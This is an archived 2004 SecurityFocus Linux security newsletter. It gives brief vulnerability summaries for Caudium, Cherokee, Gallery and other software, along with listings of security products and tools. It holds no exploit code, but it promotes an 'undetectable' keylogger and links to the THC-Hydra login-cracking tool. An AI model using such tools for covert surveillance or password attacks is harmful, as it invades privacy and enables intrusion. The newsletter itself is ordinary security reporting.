| Date: | 9 Nov 2004 17:50:05 -0000 |
From: | "Peter Laborge" <plaborge@securityfocus.com>
| To: | linux-secnews@securityfocus.com |
Subject: | SecurityFocus Linux Newsletter #209 |
SecurityFocus Linux Newsletter #209
------------------------------------
This Issue is Sponsored By: Symantec
Need to know what's happening on YOUR network? Symantec DeepSight
Analyzer
is a free service that gives you the ability to track and manage
attacks.
Analyzer automatically correlates attacks from various Firewall and
network
based Intrusion Detection Systems, giving you a comprehensive view of
your
computer or general network. Sign up today!
http://www.securityfocus.com/sponsor/Symantec_linux-secnews_041109
------------------------------------------------------------------------
I. FRONT AND CENTER
1. The Cost of Security Training
2. SSH User Identities
3. Trends in Web Application Security
4. Phishing For Savvy Users
II. LINUX VULNERABILITY SUMMARY
1. Caudium Remote Denial Of Service Vulnerability
2. Bogofilter EMail Filter Remote Quoted Printable Decoder Deni...
3. Linux Kernel IPTables Initialization Failure Vulnerability
4. QwikMail Remote Format String Vulnerability
5. Cherokee HTTPD Auth_Pam Authentication Remote Format String ...
6. PostgreSQL Unspecified RPM Initialization Script Vulnerabili...
7. Proxytunnel Remote Format String Vulnerability
8. Sun Java System Web And Application Servers Remote Denial Of...
9. Gallery Unspecified Remote HTML Injection Vulnerability
III. LINUX FOCUS LIST SUMMARY
1. Linux security compliance (Thread)
IV. NEW PRODUCTS FOR LINUX PLATFORMS
1. Cyber-Ark Inter-Business Vault
2. EnCase Forensic Edition
3. KeyGhost SX
4. SafeKit
5. Astaro Linux Firewall
6. CAT Cellular Authentication Token and eAuthentication Servic...
V. NEW TOOLS FOR LINUX PLATFORMS
1. Maillog View v1.03.3
2. BullDog Firewall 20040918
3. PIKT - Problem Informant/Killer Tool v1.17.0
4. ID-Synch 3.1
5. Nmap v3.70
6. THC-Hydra v4.3
VII. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. The Cost of Security Training
By Don Parker
The cost of providing security training to your staff may be high, but
what
is the cost of not providing any training at all?
http://www.securityfocus.com/columnists/275
2. SSH User Identities
By Brian Hatch
This article shows how to improve SSH security using public key
authentication instead of, or in addition to, password authentication.
http://www.securityfocus.com/infocus/1810
3. Trends in Web Application Security
By Kapil Raina
This article discusses current trends in penetration testing for web
application security, and in particular discusses a framework for
selecting
the best tool or tools to use for this increasingly common type of
application.
http://www.securityfocus.com/infocus/1809
4. Phishing For Savvy Users
By Scott Granneman
Recent "phishing" episodes are still often overlooked by tech-savvy
users,
but a lesson in history shows how entire nations have been fooled.
http://www.securityfocus.com/columnists/274
II. LINUX VULNERABILITY SUMMARY
-------------------------------
1. Caudium Remote Denial Of Service Vulnerability
BugTraq ID: 11567
Remote: Yes
Date Published: Oct 30 2004
Relevant URL: http://www.securityfocus.com/bid/11567
Summary:
Caudium is reported prone to a remote denial of service vulnerability.
Remote attackers may exploit this vulnerability to crash affected Web
servers, denying service to legitimate users.
Versions of Caudium prior to 1.4.4 RC2 are reported susceptible to this
vulnerability.
2. Bogofilter EMail Filter Remote Quoted Printable Decoder Deni...
BugTraq ID: 11568
Remote: Yes
Date Published: Nov 01 2004
Relevant URL: http://www.securityfocus.com/bid/11568
Summary:
A remote quoted printable decoder denial of service vulnerability
reportedly affects Bogofilter. This issue is due to a failure of the
application to handle malformed email headers.
An attacker can leverage this issue to cause the affected email filter
to crash, denying service to all legitimate users.
3. Linux Kernel IPTables Initialization Failure Vulnerability
BugTraq ID: 11570
Remote: No
Date Published: Nov 01 2004
Relevant URL: http://www.securityfocus.com/bid/11570
Summary:
Linux kernel iptables is reportedly affected by an initialization error
vulnerability. This issue is due to a design error within the
application.
This issue causes the affected utility to initialize improperly,
leading to a false sense of security as all of the firewall rules may not
always be loaded.
4. QwikMail Remote Format String Vulnerability
BugTraq ID: 11572
Remote: Yes
Date Published: Nov 01 2004
Relevant URL: http://www.securityfocus.com/bid/11572
Summary:
It is reported that QwikMail is susceptible to a remote format string
vulnerability. This issue is due to a failure of the application to
properly sanitize user-supplied input before using it as the format
specifier in a formatted printing function.
This vulnerability reportedly allows remote attackers to execute
arbitrary code in the context of the affected daemon process.
Version 0.3 was reported susceptible to this vulnerability. Other
versions may also be affected.
5. Cherokee HTTPD Auth_Pam Authentication Remote Format String ...
BugTraq ID: 11574
Remote: Yes
Date Published: Nov 01 2004
Relevant URL: http://www.securityfocus.com/bid/11574
Summary:
It is reported that Cherokee is susceptible to a remote format string
vulnerability. This issue is due to a failure of the application to
properly sanitize user-supplied input before using it as the format
specifier in a formatted printing function.
A remote attacker may exploit this vulnerability to execute arbitrary
code in the context of the affected service.
6. PostgreSQL Unspecified RPM Initialization Script Vulnerabili...
BugTraq ID: 11575
Remote: Unknown
Date Published: Nov 01 2004
Relevant URL: http://www.securityfocus.com/bid/11575
Summary:
An unspecified RPM initialization script vulnerability affects
PostgreSQL. The underlying issue causing this vulnerability is currently
unknown.
The impact of this issue is currently unknown. This BID will be
updated immediately upon the release of more information.
7. Proxytunnel Remote Format String Vulnerability
BugTraq ID: 11592
Remote: Yes
Date Published: Nov 03 2004
Relevant URL: http://www.securityfocus.com/bid/11592
Summary:
Proxytunnel is prone to a remotely exploitable format string
vulnerability. This vulnerability is exposed when the proxy server handles
malicious input from another remote server. This issue occurs when the
software is run in daemon mode.
Successful exploitation of this vulnerability may allow for execution
of arbitrary code in the context of the proxy server.
8. Sun Java System Web And Application Servers Remote Denial Of...
BugTraq ID: 11593
Remote: Yes
Date Published: Nov 03 2004
Relevant URL: http://www.securityfocus.com/bid/11593
Summary:
A remote denial of service vulnerability affects the Sun Java Web
Server and the Sun Java Application Server. This issue is due to a failure
of the server applications to process malformed data.
An attacker may exploit this issue to cause the affected server to
crash, denying service to legitimate users.
9. Gallery Unspecified Remote HTML Injection Vulnerability
BugTraq ID: 11602
Remote: Yes
Date Published: Nov 03 2004
Relevant URL: http://www.securityfocus.com/bid/11602
Summary:
An unspecified HTML injection vulnerability reportedly affects Gallery.
This issue is due to a failure of the application to properly sanitize
user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in
the browser of an unsuspecting user. This may facilitate the theft of
cookie-based authentication credentials as well as other attacks.
III. LINUX FOCUS LIST SUMMARY
-----------------------------
1. Linux security compliance (Thread)
Relevant URL:
http://www.securityfocus.com/archive/91/380267
IV. NEW PRODUCTS FOR LINUX PLATFORMS
------------------------------------
1. Cyber-Ark Inter-Business Vault
By: Cyber-Ark
Platforms: Linux, Windows 2000, Windows NT, Windows XP
Relevant URL:
http://www.cyber-ark.com/datasecuritysoftware/inter-business_vault.htm
Summary:
Based on Cyber-Ark Software's Vaulting Technology, the Inter-Business
Vault, an information security solution that enables organizations to
safely overcome traditional network boundaries in order to securely share
business information among customers, business partners, and remote
branches. It provides a seamless, LAN-like experience over the Internet
that includes all the security, performance, accessibility, and ease of
administration required to allow organizations to share everyday
information worldwide. To learn more about these core attributes of the
Inter-Business Vault click on the relevant link below:
2. EnCase Forensic Edition
By: Guidance Software Inc.
Platforms: DOS, FreeBSD, Linux, MacOS, NetBSD, OpenBSD, PalmOS,
Solaris, UNIX, Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.guidancesoftware.com/products/EnCaseForensic/index.shtm
Summary:
EnCase Forensic Edition Version 4 delivers the most advanced features
for computer forensics and investigations. With an intuitive GUI and
superior performance, EnCase Version 4 provides investigators with the
tools to conduct large-scale and complex investigations with accuracy and
efficiency. Guidance Software?s award winning solution yields
completely non-invasive computer forensic investigations while allowing
examiners to easily manage large volumes of computer evidence and view all
relevant files, including "deleted" files, file slack and unallocated
space.
The integrated functionality of EnCase allows the examiner to perform
all functions of the computer forensic investigation process. EnCase's
EnScript, a powerful macro-programming language and API included within
EnCase, allows investigators to build customized and reusable forensic
scripts.
3. KeyGhost SX
By: KeyGhost Ltd
Platforms: BeOS, DOS, Linux, OS/2, Solaris, SunOS, Windows 2000,
Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.keyghost.com/SX/
Summary:
KeyGhost SX discreetly captures and records all keystrokes typed,
including chat conversations, email, word processor, or even activity within
an accounting or specialist system. It is completely undetectable by
software scanners and provides you with one of the most powerful stealth
surveillance applications offered anywhere.
Because KeyGhost uses STRONG 128-Bit encryption to store the recorded
data in it?s own internal memory (not on the hard drive), it is
impossible for a network intruder to gain access to any sensitive data stored
within the device.
4. SafeKit
By: Evidian Inc.
Platforms: AIX, HP-UX, Linux, Solaris, Windows 2000
Relevant URL: http://www.evidian.com/safekit/index.htm
Summary:
Evidian's SafeKit technology makes it possible to render any
application available 24 hours per day. With no extra hardware: just use your
existing servers and install this software-only solution.
This provides ultimate scalability. As your needs grow, all you need to
do is add more standard servers into the cluster. With the load
balancing features of SafeKit, you can distribute applications over multiple
servers. If one system fails completely, the others will continue to
serve your users.
5. Astaro Linux Firewall
By: Astaro
Platforms: Linux
Relevant URL: http://www.astaro.com/php/statics.php?action=asl&lang=gb
Summary:
Astaro Linux Firewall: All-in-one firewall, virus protection, content
filtering and spam protection internet security software package for
Linux.
Free download for home users.
6. CAT Cellular Authentication Token and eAuthentication Servic...
By: Mega AS Consulting Ltd
Platforms: Java, Linux, OpenBSD, Os Independent, SecureBSD, Solaris,
UNIX, Windows 2000, Windows NT
Relevant URL: http://www.megaas.co.nz
Summary:
Low cost, easy to use Two Factor Authentication One Time Password token
using the Cellular. Does not use SMS or communication, manages multiple
OTP accounts - new technology. For any business that want a safer
access to its Internet Services. More information at our site.
We also provide eAuthentication service for businesses that will not
buy an Authentication product but would prefer to pay a monthly charge
for authentication services from our our CAT Server.
V. NEW TOOLS FOR LINUX PLATFORMS
--------------------------------
1. Maillog View v1.03.3
By: Angelo 'Archie' Amoruso
Relevant URL: http://www.netorbit.it/modules.html
Platforms: Linux
Summary:
Maillog View is a Webmin module that allows you to easily view all your
/var/log/maillog.* files. It features autorefresh, message size
indication, ascending/descending view order, compressed file support, and a
full statistics page. Sendmail, Postfix, Exim, and Qmail (partially) are
supported. Courier MTA support is experimental.
2. BullDog Firewall 20040918
By: Robert APM Darin
Relevant URL: http://tanaya.net/BullDog
Platforms: Linux
Summary:
Bulldog is a powerful but lightweight firewall for heavy use systems.
With many features, this firewall can be used by anyone who wants to
protect his/her systems.
This system allow dynamic and static rules sets for maximum protection
and has several advance features.
This firewall will work for the hobbyist or a military base. Generation
7 is a complete rewrite and redesign from scratch.
Be prepared to spend some time setting this up.
3. PIKT - Problem Informant/Killer Tool v1.17.0
By: Robert Osterlund, robert.osterlund@gsb.uchicago.edu
Relevant URL: http://pikt.org
Platforms: AIX, FreeBSD, HP-UX, IRIX, Linux, Solaris, SunOS
Summary:
PIKT is a cross-categorical, multi-purpose toolkit to monitor and
configure computer systems, organize system security, format documents,
assist command-line work, and perform other common systems administration
tasks.
PIKT's primary purpose is to report and fix problems, but its
flexibility and extendibility evoke many other uses limited only by your
imagination.
4. ID-Synch 3.1
By: M-Tech Information Technology, Inc.
Relevant URL: http://idsynch.com/
Platforms: AIX, AS/400, DG-UX, Digital UNIX/Alpha, HP-UX, IRIX, Linux,
MacOS, MPE/iX, Netware, OpenBSD, OpenVMS, OS/2, OS/390, RACF, Solaris,
SunOS, True64 UNIX, Ultrix, VM, VMS, VSE, Windows 2000, Windows NT
Summary:
ID-Synch is enterprise user provisioning software. It reduces the cost
of user administration, helps new and reassigned users get to work more
quickly, and ensures prompt and reliable access termination. This is
accomplished through automatic propagation of changes to user profiles
from systems of record to managed systems, with self service workflow for
security change requests, through consolidated and delegated user
administration, and with federation.
5. Nmap v3.70
By: Fyodor
Relevant URL: http://www.insecure.org/nmap/
Platforms: AIX, BSDI, FreeBSD, HP-UX, IRIX, Linux, NetBSD, OpenBSD,
Solaris, SunOS, UNIX
Summary:
Nmap is a utility for port scanning large networks, although it works
fine for single hosts. Sometimes you need speed, other times you may
need stealth. In some cases, bypassing firewalls may be required. Not to
mention the fact that you may want to scan different protocols (UDP,
TCP, ICMP, etc.). Nmap supports Vanilla TCP connect() scanning, TCP SYN
(half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp
proxy (bounce attack) scanning, SYN/FIN scanning using IP frag
6. THC-Hydra v4.3
By: THC
Relevant URL: http://www.thc.org/releases/hydra-4.3-src.tar.gz
Platforms: AIX, FreeBSD, HP-UX, IRIX, Linux, NetBSD, OpenBSD, Solaris,
UNIX
Summary:
THC-Hydra - parallized login hacker is available: for Samba, FTP, POP3,
IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS,
Cisco and more. Includes SSL support and is part of Nessus. Visit the
project web site to download Win32, Palm and ARM binaries. Changes:
important bugfix!
VII. SPONSOR INFORMATION
-----------------------
This Issue is Sponsored By: Symantec
Need to know what's happening on YOUR network? Symantec DeepSight
Analyzer
is a free service that gives you the ability to track and manage
attacks.
Analyzer automatically correlates attacks from various Firewall and
network
based Intrusion Detection Systems, giving you a comprehensive view of
your
computer or general network. Sign up today!
http://www.securityfocus.com/sponsor/Symantec_linux-secnews_041109